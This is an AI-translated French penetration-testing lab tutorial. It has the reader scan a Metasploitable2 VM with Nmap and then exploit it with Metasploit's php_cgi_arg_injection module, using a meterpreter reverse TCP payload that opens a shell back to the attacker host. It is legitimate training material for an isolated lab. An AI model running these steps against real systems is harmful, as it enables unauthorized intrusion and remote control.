Effectuer un scan de vulnérabilités et des tests de pénétration avec Nmap sur Kali Linux

CybersecurityCybersecurityBeginner
Pratiquer maintenant

💡 Ce tutoriel est traduit par l'IA à partir de la version anglaise. Pour voir la version originale, vous pouvez cliquer ici

Introduction

Dans ce laboratoire, vous apprendrez à effectuer un scan de vulnérabilités et des tests de pénétration sur une machine cible en utilisant divers outils dans Kali Linux. L'objectif est d'acquérir une expérience pratique avec les outils de scan de vulnérabilités populaires et de comprendre comment exploiter les résultats pour mener des attaques de pénétration réussies. Le laboratoire sera réalisé sur la plateforme LabEx, où vous aurez accès à un conteneur Kali Linux comme machine d'attaque et à une machine virtuelle Metasploitable2 comme cible.

Configuration de l'environnement

Dans cette étape, vous allez démarrer le conteneur Kali Linux et la machine cible Metasploitable2 sur la plateforme LabEx.

  1. Ouvrez un terminal xfce sur la machine hôte LabEx et démarrez la cible Metasploitable2 en exécutant la commande suivante :
sudo virsh start Metasploitable2

Attendez que la machine cible démarre, cela peut prendre de 1 à 3 minutes.

  1. Testez la connectivité à la machine cible en l'envoyant des paquets ICMP (ping) :
ping 192.168.122.102

Appuyez sur Ctrl+C pour arrêter le ping.

  1. Lancez le conteneur Kali Linux et entrez dans l'environnement bash en exécutant :
docker run -ti --network host b5b709a49cd5 bash
  1. À l'intérieur du conteneur Kali, testez la connexion réseau à la machine cible :
ping 192.168.122.102

Appuyez sur Ctrl+C pour arrêter le ping.

Effectuer un scan de vulnérabilités avec Nmap

Dans cette étape, vous allez découvrir certains outils de scan de vulnérabilités populaires disponibles dans Kali Linux.

  1. X-scan : X-scan est un outil de scan complet bien connu en Chine. Il est entièrement gratuit, ne nécessite pas d'installation et prend en charge à la fois des interfaces graphiques et en ligne de commande en chinois et en anglais. X-scan a été développé par un célèbre groupe de hackers chinois appelé "Security Focus" et a été constamment amélioré depuis sa version de test interne 0.2 en 2000.

  2. Nessus : Nessus est l'un des logiciels de scan et d'analyse de vulnérabilités les plus largement utilisés dans le monde. Plus de 75 000 organisations utilisent Nessus pour scanner leurs systèmes informatiques. Nessus a été créé par Renaud Deraison en 1998 dans le but de fournir au communauté Internet un programme de scan de sécurité de systèmes distants gratuit, puissant, fréquemment mis à jour et facile à utiliser.

  3. SQLmap : SQLmap est un outil d'injection SQL automatique qui peut scanner, détecter et exploiter les vulnérabilités d'injection SQL dans une URL donnée. Il prend actuellement en charge les bases de données MS - SQL, MySQL, Oracle et PostgreSQL. SQLmap utilise quatre techniques d'injection SQL uniques : l'inférence aveugle, les requêtes UNION, les requêtes empilées et l'injection aveugle basée sur le temps.

  4. Nmap : Nmap est un outil puissant et polyvalent d'exploration de réseau et d'audit de sécurité. Il peut être utilisé à diverses fins, notamment la découverte de réseau, le scan de ports et la détection de vulnérabilités.

Maintenant, vous allez utiliser Nmap pour effectuer un scan de vulnérabilités sur la machine cible Metasploitable2.

  1. Démarrez le service de base de données Metasploit et initialisez la base de données :
cd ~
service postgresql start
msfdb init
  1. Lancez la console Metasploit :
msfconsole
  1. Dans la console Metasploit, utilisez la commande nmap pour scanner la machine cible :
nmap -sS -T4 192.168.122.102

Voici un exemple de sortie que vous pourriez voir :

[*] exec: nmap -sS -T4 192.168.122.102

Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-23 23:15 UTC
Nmap scan report for 192.168.122.102
Host is up (0.0032s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 52:54:00:1E:9E:B4 (QEMU virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds

Le paramètre -sS effectue un scan TCP SYN (également connu sous le nom de scan semi - ouvert ou furtif), et -T4 définit la stratégie de temporisation comme étant agressive, mais pas trop rapide pour éviter un trafic réseau excessif.

  1. Observez la sortie du scan, qui devrait afficher les ports ouverts et les services sur la machine cible.

Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection

Exploitation d'une vulnérabilité

Dans cette étape, vous utiliserez les informations recueillies lors du scan Nmap pour exploiter une vulnérabilité sur la machine cible Metasploitable2.

  1. Tout d'abord, si vous n'êtes pas dans la console Metasploit, vous devriez démarrer la console Metasploit :
cd ~
msfconsole
  1. À partir des résultats du scan Nmap, identifiez un port ouvert sur la machine cible, par exemple, le port 80. Dans la console Metasploit, recherchez un module d'exploitation lié au port ouvert :
search http
  1. Utilisez le module d'exploitation approprié :
use exploit/multi/http/php_cgi_arg_injection
  1. Définissez l'adresse IP de la machine cible :
set RHOST 192.168.122.102
  1. Définissez la charge utile (payload) à utiliser :
set PAYLOAD php/meterpreter/reverse_tcp
  1. Définissez l'adresse IP de la machine locale :
set LHOST 192.168.122.1
  1. Exécutez l'exploitation :
exploit

Voici un exemple de sortie que vous pourriez voir :

[*] Started reverse TCP handler on 192.168.122.1:4444
[*] Sending stage (39927 bytes) to 192.168.122.102
[*] Meterpreter session 1 opened (192.168.122.1:4444 -> 192.168.122.102:38510) at 2024-03-23 23:21:14 +0000
  1. Si l'exploitation réussit, vous devriez avoir accès au shell de la machine cible. Vérifiez l'accès en exécutant des commandes telles que sysinfo pour afficher les informations système.

  2. Si vous avez du temps, vous pouvez essayer d'explorer d'autres outils de scan de vulnérabilités comme Nessus, SQLmap ou X-scan. Vous pouvez également tenter d'exploiter différentes vulnérabilités sur la machine cible Metasploitable2.

Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection

Résumé

Dans ce laboratoire, vous avez appris à configurer un environnement Kali Linux pour les tests de pénétration et à utiliser des outils de scan de vulnérabilités populaires comme Nmap pour identifier les vulnérabilités potentielles d'un système cible. Vous avez également acquis une expérience pratique en exploitant une vulnérabilité à l'aide du Framework Metasploit. Ces connaissances pratiques vous aideront à comprendre l'importance du scan de vulnérabilités et des tests de pénétration dans le domaine de la cybersécurité.